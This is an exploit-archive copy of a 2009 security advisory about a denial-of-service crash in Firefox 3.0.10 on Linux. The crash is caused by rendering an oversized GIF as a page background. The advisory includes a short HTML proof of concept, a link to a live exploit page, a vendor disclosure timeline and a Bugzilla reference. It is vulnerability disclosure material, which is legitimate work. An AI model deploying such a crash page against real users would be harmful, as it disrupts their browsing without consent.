Advertisement






Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services

CVE Category Price Severity
Not specified CWE-754 $5000 High
Author Risk Exploitation Type Date
Unknown High Remote 2009-06-22
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.8 0.9786

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009060140

Below is a copy:

____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____   |    __)_ /    \  \//    ~    \/   |    |        \\     \___\    Y    /    |    /_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_110$2009

------------------------------------------------------------------------
--------
[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services 
------------------------------------------------------------------------
--------

Author		: Ahmad Muammar W.K (a.k.a) y3dips
Date Found	: June, 4th 2009
Location	: Indonesia, Jakarta
web		: http://e-rdc.org/v1/news.php?readmore=137
Critical Lvl	: Moderated
Impact		: Browser will automatically shutdown
Where		: From Remote
Disclosure Policy: Full Disclosure Policy (RFPolicy) v2.0
                  http://www.wiretrip.net/rfp/policy.html
------------------------------------------------------------------------
--------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Firefox is a popular Internet browser from the Mozilla Corporation.

Application	: Firefox for GNU/linux
version		: Firefox/3.0.10 (X11; Linux i686; U; en)
                  Also affected for lower version (tested for version 3.0.8 at
                  Ubuntu 9.0.4)
			
URL		: http://firefox.com
Bugzilla entry  : https://bugzilla.mozilla.org/show_bug.cgi?id=496265

Description 	:

Firefox 3.0.10 (previous version) for GNU/Linux Operating systems are unable to 
handle big size of GIF images rendering when it becomes a body backgrounds. 
Just use a random size GIF files will crash firefox because of HTML body tag.

------------------------------------------------------------------------
--------

Exploit Code:
~~~~~~~~~~~~~~~~

<!-- Firefox 3.0.10 DOS exploit, discovered by 
     Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) 
     http://y3dips.echo.or.id
//-->

<html>

<head>

<title>Firefox Exploit</title>

<body background="exploit.gif">

</body>

</html>

live exploit :

http://y3dips.echo.or.id/tempe/ff310expl/

------------------------------------------------------------------------
--------

Timeline:
~~~~~~~~~

- 20 - 05 - 2009 bug found
- 04 - 06 - 2009 vendor contacted and adding entry to bugzilla
- 04 - 06 - 2009 vendor response, and there`s a potential patch
- 09 - 06 - 2009 advisory release

------------------------------------------------------------------------
--------
Shoutz:
~~~~~~~

~ my family (ana my wife and ali my son)

~ the_day, K-159, negative, hero, az001, rey, and also all echo staff
~ janex vind "waraxe", str0ke, chopstick
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net

------------------------------------------------------------------------
--------
Contact:
~~~~~~~~

y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ---------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum